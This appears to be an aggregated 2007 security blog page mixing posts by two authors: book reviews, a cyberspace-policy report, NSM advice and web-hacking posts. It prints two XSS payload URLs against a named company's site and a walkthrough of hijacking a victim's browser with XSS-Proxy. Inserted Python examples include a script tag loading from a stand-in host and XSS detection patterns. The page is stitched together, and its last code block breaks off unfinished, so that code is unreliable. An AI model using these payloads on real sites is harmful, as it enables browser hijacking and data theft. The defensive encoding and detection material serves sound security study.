Yesterday, I heard from my colleagues that we would be joining forces with ScanAlert and I was really puzzled by the move. I was asking myself if ScanAlert is really Hacker Safe. Are they really that good with their scanners? Did they use open source scanners and customize them as their own? Are those clients they have really safe from hackers? Can I say that if I use ScanAlert's service to scan my website or network, I will be safe from hackers? There are a lot of questions in my head and I think ScanAlert has a good way of doing marketing. They make every customer insert their logo onto their own site, which provides more visibility for ScanAlert's service. Well, it is good from a company point of view because they are recognized and make money out of it; however, that doesn't mean that by using their service, I will be free from attackers. Not long ago, I remember members of sla.ckers.org posted XSS vulnerabilities on their site. So can I say that if I can find XSS on their site, their scanners are shitty and they are still Hacker Safe? I don't know, just my 2 cents worth. Anyway, I managed to dig out the XSS vectors that were injected on their site some time ago; however, they have already patched them.

https://www.scanalert.com/SignUp.sa?act=step1&oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F

https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22

The Hacka Man

Wednesday, 17 October 2007

Review of LAN Switch Security Posted

Amazon.com just posted my three star review of LAN Switch Security: What Hackers Know About Your Switches. From the review:

I really looked forward to reading LAN Switch Security (LSS), simply because it covered layer 2 issues. These days application security, rootkits, and similar topics get all the press, but the foundation of the network is still critical. Unfortunately, LSS disappointed me enough to warrant this three star review. I'm afraid those before me who wrote five star reviews 1) don't read enough other books or 2) don't set their expectations high enough.

The bottom line is that if you want to read a good Cisco security book, the best available is still Hacking Exposed: Cisco Networks.

Monday, 15 October 2007

CSI Annual 2007 Contest

I've been given a press pass to attend CSI 2007 in Washington, DC, 3-9 November 2007. In exchange for posting the following, I've also got a $100 discount for anyone using the code CSI2007.

CSI Annual Conference 2007
November 3-9, 2007
Hyatt Regency Crystal City
Arlington, Virginia
www.CSIAnnual.com

CSI 2007, held November 3-9 in Arlington, VA, delivers a business-focused overview of enterprise security. 2,000+ delegates, 80 exhibitors, and 100+ sessions/seminars convene to provide a roadmap for integrating policies and procedures with new tools and techniques.

Register now using code: CSI2007 and save $100 off the conference or get a Free Exhibition Pass at www.csiannual.com.


If you think it's not worth $100 to my readers to see the previous text, how about this: I have two free full conference passes (together worth over $3000), courtesy of CSI, to be awarded to blog readers.

How do I decide who should get them? I'm going to hold an essay contest. The two best essays (judged by me) that address any of the following categories will win:

  • Discuss why control-compliant approaches to security like FISMA are a disaster.

  • Explain why detection systems should be kept separate from policy enforcement systems; see Considering Convergence? for background.

  • Tell us how Network Security Monitoring helped you perform your detection and response mission for a real incident. (You can anonymize your employer or organization.)

  • Any of the other "hot button" topics you've read at this blog.


Please send an email to taosecurity [at] gmail [dot] com with your answer, or publish it at your blog. Winning entries will be published on this blog.

Entries for the contest must be received by me via email no later than 8 pm eastern time Tuesday 23 October 2007.

Thank you to CSI for providing these free passes and discounts.

Friday, 12 October 2007

Air Force Cyberspace Report

This week I attended Victory in Cyberspace, an event held at the National Press Club. It centered on the release of a report written by Dr. Rebecca Grant for the Air Force Association's Eaker Institute. The report is titled Victory in Cyberspace (.pdf). The panel (pictured at left) included Lt. Gen. Robert J. Elder, Lt. Gen. (ret.) John R. Baker, and Gen. (ret.) John P. Jumper. Dr. Grant is seated at the far right.

As far as the event went, I found it interesting. If you are exceptionally motivated you can download the entire 90 min briefing in .wmv format here. I'd like to share a few thoughts.

First, I was impressed by all the speakers. Lt. Gen. Baker led AIA when I was a Captain there. At the same time Gen. Jumper led Air Combat Command, before becoming Chief of Staff. I learned Lt. Gen. Elder has a PhD in engineering.

Lt. Gen. Elder commented that cyberspace is a domain similar to the ocean, and he specifically drew parallels with the Navy. (This made me wonder why the Navy isn't taking the lead on defending cyberspace.) In order to use the ocean for commercial purposes, the domain must be controlled so ships are protected from harm. Cyberspace is similar, except that in addition to requiring control of the domain in order to use it, the domain must first be created. (No one needs to create an ocean.)

Control, however, does not mean "ownership." Elder specifically stated the Air Force does not plan to "own cyberspace;" cyberspace is more of a "strategic commons" like the ocean. Cyberspace is also not confined only to the Internet. A presentation by Dr. Lani Kass titled Cyberspace: A Warfighting Domain cites the classified National Military Strategy for Cyberspace Operations to define cyberspace as:

a domain characterized by the use of electronics and the electromagnetic spectrum to store, modify and exchange data via networked systems and associated physical infrastructures.

(Speaking of the NMSCO, I read a Joint document is en route, according to Joint Staff readies cyber operations plan.)

Elder's presentation featured plenty of military jargon, like the great "OODA loop" (observe, orient, decide, act) and a new "effects chain" (find, fix, target, engage). (That sounds like the OODA loop, doesn't it?)

One of Elder's major points, reflected in the report, is the Air Force's recognition that cyberspace (broadly meaning communications, I believe) is the foundation for all Air Force operations. I would argue that all of the services are equally dependent on cyberspace. That reminds me of the role of United States Transportation Command. It makes sense to me that cyberspace activities are currently part of United States Strategic Command.

USSTRATCOM accomplishes its cyber mission through the Joint Task Force - Global Network Operations (JTF-GNO, led by the commander of Defense Information Systems Agency), Joint Functional Component Command - Network Warfare (JFCC-NW, led by the director of National Security Agency), and Joint Information Operations Warfare Command (JIOWC, led by the commander of Air Force Intelligence, Surveillance, and Reconnaissance Agency).

If cyberspace is truly a warfighting domain (alongside land, sea, aerospace), I don't see who can argue against an independent Cyber Force. (I don't argue for a separate Space Force because I think the Air Force will eventually be the Aerospace Force.) Elder rejects the idea of an individual Cyber Force in Dr. Grant's report, but the Army had the same feeling about the Air Corps before 1947. We can separate the world into physical and virtual, or as the military likes to say, "kinetic" and "non-kinetic." I find it hard to believe that a cyber operator who reads and manipulates hex is going to find much in common with someone who kills people by exploding ordnance.

Elder mentioned some of the tasks the Air Force expects to perform to better secure its networks. These included a "cyber standardization and evaluation team," application assurance testing, software tamper detection via signatures and hashes, clusters of systems voting on proper outcomes, "cyber sidearms" in the form of tools on individual laptops, and a specific cyber Air Force Specialty Code (AFSC). If this had happened 10 years ago my career would have been very different and probably much longer!
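Two of the tasks Elder listed, tamper detection via hashes and clusters of systems voting on outcomes, are simple enough to sketch in code. The following is an added example, not anything from the report or Elder's talk: it builds a SHA-256 manifest for a constructed set of deployed files, reports files that were modified, removed or added since the manifest was taken, and runs a majority vote over constructed outputs from redundant nodes, naming the dissenters so a defender can investigate them. File paths, contents, node names and function names are all this example's own.

```python
"""Hash-manifest tamper detection and majority voting (added example)."""
import hashlib
from collections import Counter


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: dict) -> dict:
    """Record the known-good digest of every deployed file (path -> hex digest)."""
    return {path: sha256_hex(content) for path, content in files.items()}


def verify_manifest(manifest: dict, files: dict) -> list:
    """Compare the current file set against the manifest.

    Returns a sorted list of (path, problem) tuples, where problem is one of
    "modified", "missing" or "unexpected"; an empty list means no tampering seen.
    """
    problems = []
    for path, expected in manifest.items():
        if path not in files:
            problems.append((path, "missing"))
        elif sha256_hex(files[path]) != expected:
            problems.append((path, "modified"))
    for path in files:
        if path not in manifest:
            problems.append((path, "unexpected"))
    return sorted(problems)


def vote(outputs: list, quorum=None):
    """Majority vote over (node, output) pairs from replicated systems.

    Returns (winner, dissenters). If no output reaches the quorum (default: a
    simple majority) the winner is None and every node is listed for review.
    """
    if quorum is None:
        quorum = len(outputs) // 2 + 1
    counts = Counter(output for _, output in outputs)
    winner, n = counts.most_common(1)[0]
    if n < quorum:
        return None, [node for node, _ in outputs]
    return winner, [node for node, output in outputs if output != winner]


# Constructed deployment: a golden file set, then the same set after tampering
# (one binary altered, one unexpected file dropped in).
GOLDEN = {
    "bin/planner": b"planner v1.0\n",
    "etc/planner.conf": b"mode=strict\n",
}
MANIFEST = build_manifest(GOLDEN)
TAMPERED = {
    "bin/planner": b"planner v1.0 + implant\n",
    "etc/planner.conf": b"mode=strict\n",
    "bin/.cache": b"\x00",
}

# Constructed outputs from three redundant nodes; node "c" disagrees.
REPLICA_OUTPUTS = [("a", "GO"), ("b", "GO"), ("c", "NO-GO")]

if __name__ == "__main__":
    print("golden:", verify_manifest(MANIFEST, GOLDEN))
    print("tampered:", verify_manifest(MANIFEST, TAMPERED))
    print("vote:", vote(REPLICA_OUTPUTS))
```

The manifest itself must be protected (signed, or stored where the systems it checks cannot write), which is where the "signatures" half of Elder's phrase comes in; a hash list an intruder can rewrite detects nothing.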

Elder finished his talk describing how the US Code affects Air Force activities. For example, Title 10 (Armed Forces) restricts the work of the active duty military. Similar restrictions affect the intelligence community through Title 50 (War and Defense). However, because the Air National Guard operates under Title 32 (National Guard), it has more room to help the commercial sector and local governments with network defense. Elder said he would like to see Guard cyber units in every state, from the size of a squadron up to a wing. I thought this was a fairly exciting concept, since the Guard is likely to contain people with industry experience.

Lt. Gen. Baker and Gen. Jumper only spoke for a few minutes each. Jumper really hammered the acquisition community for providing the "block 40 upgrade to the block 30 capability" and thinking that helps the warfighter. He recommended writing Concepts of Operations before deciding what to buy. (Wow, sounds just like the commercial world; don't let vendors drive your security program!) Jumper said we need a "PhD-quality Weapons School," aggressor forces, and policy and doctrine modeled on offensive and defensive counter-air operations.

In the question phase, when asked why the bad guys are "so much better" than the good guys, Jumper replied "Bad guys don't have policy constraints." I believe Baker stated that the biggest problem he sees in industry is the feeling that "we don't think it [breaches] can happen to us," he said, "but it's happening every day."

As far as the report itself, I realized the author did not have any experience in the topic of computer network defense, exploitation, or warfare. Having just watched two shows on Army and Marine snipers, it made me think how it must sound to a sniper for a non-sniper to write a report on sniper craft. Disappointingly, the Estonia "cyberwar" was presented as the galvanizing action that should stir everyone's pot. In describing the event, the report author wrote:

The attackers also used illicitly linked computers around the globe to mount an enhanced onslaught. These attacks were conducted by networks of "bots" -- a bot being an automated program that accesses web sites and traverses the site by following links on its pages.

So, it appears we should pin the blame on Web crawlers. Sigh.

I also read about "Windows 1.0" being released in August 1995 and "Windows 2.0" in November 1995.

Apparently no one did a technical edit of this report. It's clear it took a lot of work to write this report, however. There's plenty of history, references and interviews. I would not have wanted to undertake this task, since I would have required a few years to get the history right.

I found this one item immensely interesting, so I'll close with it:

[One] difficulty is estimating the scope of the mission. "We are well past the $5 billion per year mark, and I don't know where the top end is," commented one STRATCOM official. "The $5 billion is mostly on defense. We buy huge amounts of software and people to run that, but it's totally ineffective against Tier III" cyber [advanced persistent] threats, this official noted. (emphasis added)

Thursday, 11 October 2007

XSS-Proxy PoC

The other day, I was thinking about how I could actually get more sales during meeting sessions with customers, and with the current bloom of website hacking, I thought it's time to actually show customers what I can do and the impact of an XSS vulnerability. I referred to the book "XSS Exploit and Defence" by Jeremiah and Rsnake and I decided to go with a tool called XSS-Proxy. All I can say is this tool is really light and easy to use. All you need is Perl and a webserver running on your machine, and one would just have to launch the listener from there on with the command "perl XSS-Proxy-shmoo_0_0_11" in the command prompt. Anton Rager actually spent some time with me explaining how this tool works and the impact of an XSS. I would like to thank him here for his time and effort. Those of you who would love to try this tool can download it at http://xss-proxy.sourceforge.net. There are also Advanced XSS attacks and a mini whitepaper for further reading.

First to startup xss-proxy:


Then inject a script tag into the victim page, be it persistent or reflected; try it to realise it.


The admin page contains the links that the victim had visited, and by clicking those links, you can choose to redirect and hijack the victim browser under the same document domain.


A sample of the redirect attack. Observe the grey bar below with "Opening page..". This is achieved by clicking, on the admin page, one of the links the victim had visited. I wanted the victim to visit another page, so I chose the link I wanted the victim to visit and clicked on it. On the victim side, he will automatically be redirected to the page I chose.


And finally, I can even proxy JavaScript injection on the victim browser. A simple one would be alert('XSS');


The Hacka Man
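The two ScanAlert URLs quoted in the post above this one and the script-tag injection XSS-Proxy relies on are the same defect seen from three output contexts: untrusted input written into a JavaScript string literal, into an HTML attribute, and into element text. The following is an added example, not code from either post, from ScanAlert or from XSS-Proxy. It decodes the two quoted URLs, renders each value with plain string concatenation (the vulnerable form) beside context-aware output encoding (the fix), and uses the standard-library HTML parser to confirm that the encoded attribute no longer grows an onmouseover handler. The page templates, function names and the proxy.example hostname in the constructed script tag are this example's own.

```python
"""Context-aware output encoding against the quoted XSS vectors (added example)."""
import html
import json
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlsplit

# The two URLs quoted in the ScanAlert post.
JS_CONTEXT_URL = ("https://www.scanalert.com/SignUp.sa?act=step1&oc=%27%29return+0%3B%7D"
                  "alert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F")
ATTR_CONTEXT_URL = ("https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name="
                    "touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22")

# Constructed stand-in for the remote-script tag an XSS-Proxy style injection plants.
SCRIPT_TAG = '<script src="http://proxy.example/x.js"></script>'


def query_params(url):
    """Decode a query string into a dict, splitting each pair at its first '='."""
    out = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        out[unquote_plus(key)] = unquote_plus(value)
    return out


# --- Vulnerable rendering: the value is concatenated straight into the page ---
def render_js_unsafe(oc):
    # Constructed template: the value lands inside a single-quoted JS string literal.
    return "<script>if (check('" + oc + "')) { go(); }</script>"


def render_attr_unsafe(name):
    # Constructed template: the value lands inside a double-quoted HTML attribute.
    return '<input name="company.name" value="' + name + '">'


def render_text_unsafe(text):
    # Constructed template: the value lands in element text.
    return "<p>Welcome, " + text + "</p>"


# --- Hardened rendering: encode for the context the value actually lands in ---
def render_js_safe(oc):
    # json.dumps yields a double-quoted JS string literal with quotes, backslashes
    # and control characters escaped; breaking up "</" keeps the literal from
    # closing the surrounding <script> element.
    literal = json.dumps(oc).replace("</", "<\\/")
    return "<script>if (check(" + literal + ")) { go(); }</script>"


def render_attr_safe(name):
    # quote=True turns " into &quot; (and ' into &#x27;), so the value cannot end
    # the attribute and start a new one such as onmouseover.
    return '<input name="company.name" value="' + html.escape(name, quote=True) + '">'


def render_text_safe(text):
    # < and > become &lt; and &gt;, so an injected tag is displayed, not parsed.
    return "<p>Welcome, " + html.escape(text) + "</p>"


class _InputAttrs(HTMLParser):
    """Collects the attributes a browser-like parser sees on the <input> element."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs.update(attrs)


def input_attributes(markup):
    """Return the parsed attribute dict of the <input> in the rendered markup."""
    parser = _InputAttrs()
    parser.feed(markup)
    return parser.attrs


if __name__ == "__main__":
    name = query_params(ATTR_CONTEXT_URL)["company.name"]
    print("unsafe attrs:", input_attributes(render_attr_unsafe(name)))
    print("safe attrs:  ", input_attributes(render_attr_safe(name)))
    print(render_js_safe(query_params(JS_CONTEXT_URL)["oc"]))
```

The point a scanner badge cannot make for you: the encoding has to match the sink. HTML-escaping a value that ends up inside a JavaScript string literal, or JSON-encoding one that ends up in an attribute, leaves the payload live in the other context.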

Wednesday, 10 October 2007

Alternatives to "Expert Opinions"

If you read The Doomsday Clock you probably recognize I have a dim opinion of "expert opinion," especially by committee. At the risk of making a political statement, I rank expert opinion alongside central planning as some of the worst ways to make decisions -- at least where a large amount of complexity must be accommodated.

What is my alternative? I believe free markets are the best way to synthesize competing data points to produce an assessment. Does this sound familiar? If yes, you may be thinking of this 2003 story: The Case for Terrorism Futures:

Critics blasted policy-makers Tuesday for dropping a controversial plan to create a futures market to help predict terrorist strikes...

[S]upporters of the project point out that gathering intelligence is often a messy business, with payoffs to unsavory characters and the elimination of potential adversaries. The futures market, ugly as it may sound, doesn't involve any of those moral compromises, said Robin Hanson, one of the earlier promoters of the concept of trading floors for ideas and a PAM [Policy Analysis Market] project contributor. It's just a way of capturing people's collective wisdom...

Projects similar to PAM, like the Iowa Electronic Markets, which speculate on election results, have been surprisingly reliable indicators of what's going to happen next...

The price of orange juice futures has even been shown to accurately predict the weather...

Traders on the Hollywood Stock Exchange last year correctly picked 35 of the 40 Oscar nominees in the eight biggest categories, according to The New Yorker magazine...

"Market mechanisms are more accurate than asking people their opinions because they're putting their money or reputation on the line," said Ken Killitz of the Foresight Exchange, which speculates on everything from the future of human cloning to the possibility that Roman Catholic priests will be allowed to marry. "It gives people an incentive to reveal what they know..."

[E]xchanges "tend to predict events really well when no one person knows the answer -- when information is distributed among many people with different knowledge bases," said Joyce Berg, a University of Iowa professor who helped organize the political trading floors...

Markets also bring together people with information about a particular subject in a way blue-ribbon panels of experts can't, added Hanson.

"You get people that know things about a subject, but don't have the credentials to say so," he said. "You get people who live in these areas (of the Middle East)."

There's also "less of an ability to spin" in markets than in policy debates, Hanson noted. "So you get what people actually think, not what they say."


I love this idea. The fact that intellectual pygmies in the Senate defeated it is a real shame.

I found many interesting articles on this subject by Robin D. Hanson from George Mason University and Oxford's Future of Humanity Institute; the latter offers a Global Catastrophic Risks program that is probably more interesting (but less marketing-savvy) than the Doomsday Clock.

If you're sufficiently motivated to start arguing against this idea, I will probably just point back into the literature (especially Hanson's) countering these complaints.

If you're wondering why I mention this at all, it ties into my mention of security breach derivatives in my post Excerpts from Ross Anderson / Tyler Moore Paper.

The Doomsday Clock

Tonight I finished watching a show called The Doomsday Clock, on the best TV channel (the History Channel, of course). I was vaguely aware of the clock, maintained by the Bulletin of the Atomic Scientists, but I didn't know the history of the project. According to Minutes to Midnight:
The Bulletin of the Atomic Scientists’ Doomsday Clock conveys how close humanity is to catastrophic destruction--the figurative midnight--and monitors the means humankind could use to obliterate itself. First and foremost, these include nuclear weapons, but they also encompass climate-changing technologies and new developments in the life sciences and nanotechnology that could inflict irrevocable harm.

Interesting -- you know what this is? It's a risk assessment. In my first book I defined risk as the probability of suffering harm or loss. The Doomsday Clock supposedly displays how close we are to world-ending catastrophe.

I find two aspects of the clock appealing.



First, as depicted by Information Aesthetics, the clock rapidly and clearly communicates its message. If you see fewer and fewer minutes until midnight, you sense something bad is about to happen. It's language-neutral and concise.



Second, the act of moving the hands and then tracking hand position over time provides a sense of risk trending. As depicted by Wikipedia above, you can get a historical reading of risk by watching the number of minutes to midnight rise and fall. The interval between the hand position changes is also significant.

The problem with the Doomsday Clock is the same problem found in many, if not most, risk assessments. It is more or less arbitrary. The creation of the clock and the initial position of its hands was completely arbitrary, in fact! The designer of the clock, artistic designer Martyl Langsdorf, invented the clock for the June 1947 issue of the Bulletin. She positioned the hands to be aesthetically pleasing, not to show how close we were to destruction. When you consider the amount of time she could have worked with (12 hours), limiting herself to a fifteen minute window set a precedent for the next sixty years. While the clock has moved outside this 15 minute window (for example, in 1991) the precedent was set too narrowly. What will the bulletin do when even greater threats exist -- move to second and then nano-second increments?

In response to the Soviets' 1949 detonation of their first atomic weapon, Bulletin founder and editor Eugene Rabinowitch told Langsdorf to move the hands from 7 minutes to midnight to 3 minutes to midnight. Again, this choice was basically to convey urgency. Only when the hands were moved on the magazine cover did readers start to appreciate the information conveyed by the clock.

From this point forward, the hands have moved back and forth as the Bulletin members and, more recently, outside parties have haggled about the position of the hands. I have a feeling these meetings would drive me crazy. It's a collection of people with opinions arguing about the location of hands on a clock created originally for artistic value. Still, as noted in my two "appealing" points, I think we can learn some lessons from the Doomsday Clock regarding the ability to quickly and powerfully communicate risk to others.

While researching this post I discovered that the ACLU jumped on the "clock bandwagon" with its Surveillance Society Clock. According to the ACLU, "It's six minutes before midnight as a surveillance society draws near within the United States." This is dumb for multiple reasons.

First, the ACLU chose a digital clock. I don't know about you, but for me a digital clock doesn't convey an amount of time as visually as an analog clock. It's like a speedometer; seeing it pegged to the right is more powerful than reading "101 MPH" or similar. Second, as Wired magazine astutely asked, how do we know when we're there? It's tough to ignore Armageddon; it's easy to ignore a "surveillance state." Third, the ACLU painted itself into the same corner as the Bulletin did when it chose to set its initial time so close to midnight. What's the ACLU going to do with the clock when remote mind-reading is in use?

Be the Caveman Lawyer

A few weeks ago I recommended security people to at least Be the Caveman and perform basic adversary simulation / red teaming. Now I read Australia's top enterprises hit by laymen hackers in less than 24 hours:

A penetration test of 200 of Australia's largest enterprises has found severe network security flaws in 79 percent of those surveyed.

The tests, undertaken by University of Technology Sydney (UTS), saw 25 non-IT students breach security infrastructure and gain root or administration level access within the networks of Australia's largest companies, using hacking tools freely available on the Internet.

The students - predominantly law practitioners - were given 24 hours to breach security infrastructure on each site and were able to access customer financial details, including confidential insurance information, on multiple occasions.

High-level business executives from the companies surveyed, rather than IT staff, were informed of the tests so the "day-to-day network security" of businesses could be tested.
(emphasis added)

Again, my advice is simple, but now it is modified. Be the Caveman Lawyer.

One other point from the article:

Most of the 21 percent of companies who passed the penetration tests owed their success to freeware Intrusion Detection Systems (IDSs), according to Ghosh.

Snort was mentioned earlier in the article. That means you can be a Cheap Caveman Lawyer and prepare for common threats.

Tuesday, 09 October 2007

AppCodeScan beta Released

A few minutes ago, Shreeraj updated me on the release of a new tool from Blueinfy. This tool basically checks your source code for potential entry points for XSS, SQL injection, poor validation, etc. Well, personally I have not tested the tool due to time constraints and my busy schedule. I would strongly recommend anyone who has the time to actually download the tool and give it a try; it's free anyway. The tool is called AppCodeScan, and for those who have already tried the tool, feel free to let me know, as trust me, I am really eager to try this. Also, check out Fortify's source code scanning tool, which has similar functions and usage. The only differences are maybe the support and that it's an enterprise tool. At the same time, do check out their cost and you will know why Shreeraj is so generous to make it free. Of course, you can customize the ruleset to suit your application if you know how to. Thank you Shreeraj.

http://blueinfy.com/tools.html

The Hacka Man

Monday, 08 October 2007

Try this at your own risk, COKE Machine hacked!!

I was checking PDP's hack on Citrix and I stumbled across a coke machine hack. Well, I am not sure if this is an old exploit, or if it is still working as of today, or if it is patched. However, I could not replicate this hack on a vending machine here. Maybe it is a different model or different system or different chipset. Whatever it is, this is a cool one. Simple yet effective.



The Hacka Man

Sunday, 07 October 2007

One Review and One Prereview

Amazon.com just published my five star review of Security Data Visualization by Greg Conti. From the review:

Security Data Visualization (SDV) is a great book. It's perfect for readers familiar with security who are looking to add new weapons to their defensive arsenals. Even offensive players will find something to like in SDV. The book is essentially an introduction to the field, but it is well-written, organized, and clear. I recommend all security analysts read SDV.

I give five star reviews to books that meet certain criteria. First, the book should change the way I look at a problem, or properly introduce me to thinking about a problem for which I have little or no frame of reference. Although I have been a security analyst for ten years, I have little visualization experience. Author Greg Conti spent just the right amount of time explaining the field, describing key terms (preattentive processing, occlusion, brushing) and displays (star plots, small multiples, TreeMaps). I loved the author's mention of Ben Shneiderman's visualization mantra: "overview first, zoom and filter, details on demand" (p 14).


I'd like to mention another great No Starch book called Linux Firewalls by my friend Mike Rash. Mike was kind enough to ask me to write the foreword. If you look at my quote on the front cover (click on the image) you might think "Wow, Bejtlich is creative." Here's the context for that quote, from the foreword:

I'd like to conclude these thoughts by speaking as a book reviewer and author. Between 2000 and mid-2007 I've read and reviewed nearly 250 technical books. I've also written several books, so I believe I can recognize a great book when I see it. "Linux Firewalls" is a great book. As a FreeBSD user, "Linux Firewalls" is good enough to make me consider using Linux in certain circumstances!

No Starch has several more great books on the way, including Absolute FreeBSD, 2nd Ed (on FreeBSD 7.x) and several others.

Just another XSS

Well, I am getting tired of your site "big organization". PoC shown with screenshots of your site being XSS'd numerous times. Just patch up quick and you will be alright. Hire me or get someone to do the job. Whatever you decide, wish you good luck and all the best.



The Hacka Man

Sabtu, 06 Oktober 2007

Intruders Continue to Be Unpredictable

One of my three basic security principles is advanced intruders are unpredictable. Believing you can predict what intruders are going to do next results in soccer-goal security. As I said in Pescatore on Security Trends, advanced attackers are digital innovators. I think I will start calling advanced intruders intrupreneurs.

I just read and watched great examples of this principle in action courtesy of pdp at CITRIX: Owning the Legitimate Backdoor. I recommend reading the post and watching the two videos. If you are practicing Network Security Monitoring I recommend querying your session data for all incoming Citrix traffic, for as far back as you have stored, for unusual or unexpected activity. If you are not practicing NSM already I suggest beginning emergency NSM to watch your Citrix servers.

It's important to realize that you may not even know you have certain Citrix servers active on your network. The flip side of the intruders are unpredictable principle is that your network is probably unpredictable too! In other words, you could be happy thinking "we have no Citrix servers," but after looking via NSM you find you do. It's probable a bad guy found them before you did, but courtesy of NSM you have data about what happened. More often than not, that's the best you can do with your time and resources.
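The session-data query suggested above, as an added example that is not part of the original post and not code from any NSM tool: it walks a set of constructed SANCP-like session records, keeps TCP sessions from outside the monitored range to the Citrix ports (assumed here to be TCP 1494 for ICA and TCP 2598 for Session Reliability/CGP), and reports any destination server missing from a constructed asset inventory. The internal range 10.0.0.0/8, the inventory and every record are assumptions made for the example.

```python
"""Added example (mine, not from the original post or any NSM tool): query
session records for inbound Citrix traffic and flag servers missing from
the asset inventory.

Assumptions, all constructed for illustration: session records are CSV lines
in a SANCP-like layout; Citrix ICA is TCP 1494 and Session Reliability (CGP)
is TCP 2598; 10.0.0.0/8 is the monitored internal range; KNOWN_CITRIX_SERVERS
is what the team believes it owns.
"""
import ipaddress
from collections import defaultdict

CITRIX_PORTS = {1494: "ICA", 2598: "CGP"}
INTERNAL = ipaddress.ip_network("10.0.0.0/8")

# Constructed inventory: the Citrix servers the team knows about.
KNOWN_CITRIX_SERVERS = {"10.1.5.20"}

# Constructed session records:
# start_time,src_ip,src_port,dst_ip,dst_port,ip_proto,bytes_to_server
SESSIONS = """\
2007-10-06 02:14:11,203.0.113.8,51234,10.1.5.20,1494,6,8840
2007-10-06 02:15:03,203.0.113.8,51240,10.1.5.20,2598,6,129400
2007-10-06 09:30:45,10.1.7.33,40221,10.1.5.20,1494,6,2200
2007-10-06 11:02:19,198.51.100.77,33001,10.1.9.250,1494,6,640
2007-10-06 11:05:00,198.51.100.77,33002,10.1.9.250,1494,6,45000
2007-10-06 12:00:00,10.2.3.4,45000,10.1.5.20,443,6,300
"""


def parse_sessions(text):
    """Turn CSV session lines into dicts; blank and '#' lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, _sport, dst, dport, proto, nbytes = line.split(",")
        records.append({
            "time": ts,
            "src": ipaddress.ip_address(src),
            "dst": ipaddress.ip_address(dst),
            "dport": int(dport),
            "proto": int(proto),
            "bytes": int(nbytes),
        })
    return records


def find_inbound_citrix(records, known_servers):
    """Return (hits, unknown): TCP sessions from outside INTERNAL to a Citrix
    port on an INTERNAL host, plus the destination servers not in inventory."""
    hits = [
        r for r in records
        if r["proto"] == 6
        and r["dport"] in CITRIX_PORTS
        and r["src"] not in INTERNAL
        and r["dst"] in INTERNAL
    ]
    unknown = {str(r["dst"]) for r in hits} - set(known_servers)
    return hits, unknown


def summarize(hits):
    """Per-server session count, distinct external sources and bytes sent."""
    per_server = defaultdict(lambda: {"sessions": 0, "sources": set(), "bytes": 0})
    for r in hits:
        entry = per_server[str(r["dst"])]
        entry["sessions"] += 1
        entry["sources"].add(str(r["src"]))
        entry["bytes"] += r["bytes"]
    return dict(per_server)


if __name__ == "__main__":
    hits, unknown = find_inbound_citrix(parse_sessions(SESSIONS), KNOWN_CITRIX_SERVERS)
    for server, entry in sorted(summarize(hits).items()):
        tag = "UNKNOWN SERVER" if server in unknown else "known"
        print(f"{server} [{tag}]: {entry['sessions']} sessions from "
              f"{sorted(entry['sources'])}, {entry['bytes']} bytes to server")
```

Run against the constructed data, the script reports two servers: 10.1.5.20 from the inventory and 10.1.9.250, which nobody knew was accepting ICA from the Internet. The internal-to-internal ICA session and the HTTPS session are left out, since the question posed in the post is about incoming Citrix traffic; widening the filter to all Citrix sessions is a one-line change if you also want to see internal use.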

Jumat, 05 Oktober 2007

Prevention is better than Cure

With over 6 years of experience in penetration tests of all sorts of systems, from networks to web applications to databases and many others, I can say that I have successfully achieved my goals as a "hacker" or white hat. As usual, I am constantly keeping myself abreast of the latest exploits and hacking methodology. I am not really a true researcher, but rather a guy who loves to read all sorts of hacking books and articles.

Well, with the recent work I am doing on web applications, I can say that most web applications are truly not secure and are hackable, except for a few out there. It all boils down to the developers and the customers. Those customers have no idea of how important secure programming is. Once they are hacked, their reputation is gone and data is lost. From what I see, customers are always eager to launch their application online, maybe because of a certain time frame they have to meet or maybe because they are eager to let consumers know more about their services and products, but they did not think about security on their applications as a whole. Well, I would advise them to think twice and think about the possibility of being hacked hard. Below are a few guidelines that I got from Jeremiah's whitepaper; after reading it, I feel that it is important to embrace them, rather than treating it like just another whitepaper.

Secure Code: Application developers must consider security from the beginning. Involve the security staff early in the process.

QA Development: Experienced staff must perform periodic security as well as usability reviews.

Stay up-to-date on patches and configure systems securely.

Continuous assessments: Covering both technical and logical issues on the production web site as it is being changed.

Also, for those who are paranoid about your web applications and have no budget to spend, you should install a Web Application Firewall like ModSecurity to shield off most of the attacks; moreover, it is customizable, so you can add your own ruleset. There are also a few other open source WAFs like PHP-IDS for XSS, URLScan for IIS and some others. Commercial ones are available too. It all depends on how much you can spend and what you really need.
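To make the "prevention is better than cure" point concrete, here is an added example that is not part of the original post and is not ModSecurity's or PHP-IDS's code: a minimal WAF-style request filter in the spirit of a custom ruleset, placed next to the fix it is meant to shield, contextual output encoding in the application itself. The application, its `name` parameter and the three rule patterns are all assumptions constructed for the example, and the patterns are deliberately far narrower than any real ruleset.

```python
"""Added example (mine, not from the original post and not ModSecurity's or
PHP-IDS's code): a minimal WAF-style request filter next to the prevention it
shields but cannot replace, contextual output encoding in the application.

Assumptions, all constructed: the application echoes a 'name' parameter into
an HTML page; the three rule patterns are illustrative and far narrower than
a real ruleset.
"""
import html
import re

# Constructed signature rules in the spirit of a WAF ruleset: (rule id, pattern).
RULES = [
    ("1001", re.compile(r"<\s*script\b", re.I)),
    ("1002", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("1003", re.compile(r"javascript\s*:", re.I)),
]


def inspect_request(params):
    """WAF layer: return (blocked, rule_id, param) for the first rule hit."""
    for param, value in params.items():
        for rule_id, pattern in RULES:
            if pattern.search(value):
                return True, rule_id, param
    return False, None, None


def render_unsafe(name):
    """The 'before' case: raw interpolation into HTML (reflected XSS)."""
    return "<p>Hello, %s!</p>" % name


def render_safe(name):
    """The fix: HTML-escape untrusted data for the HTML text context."""
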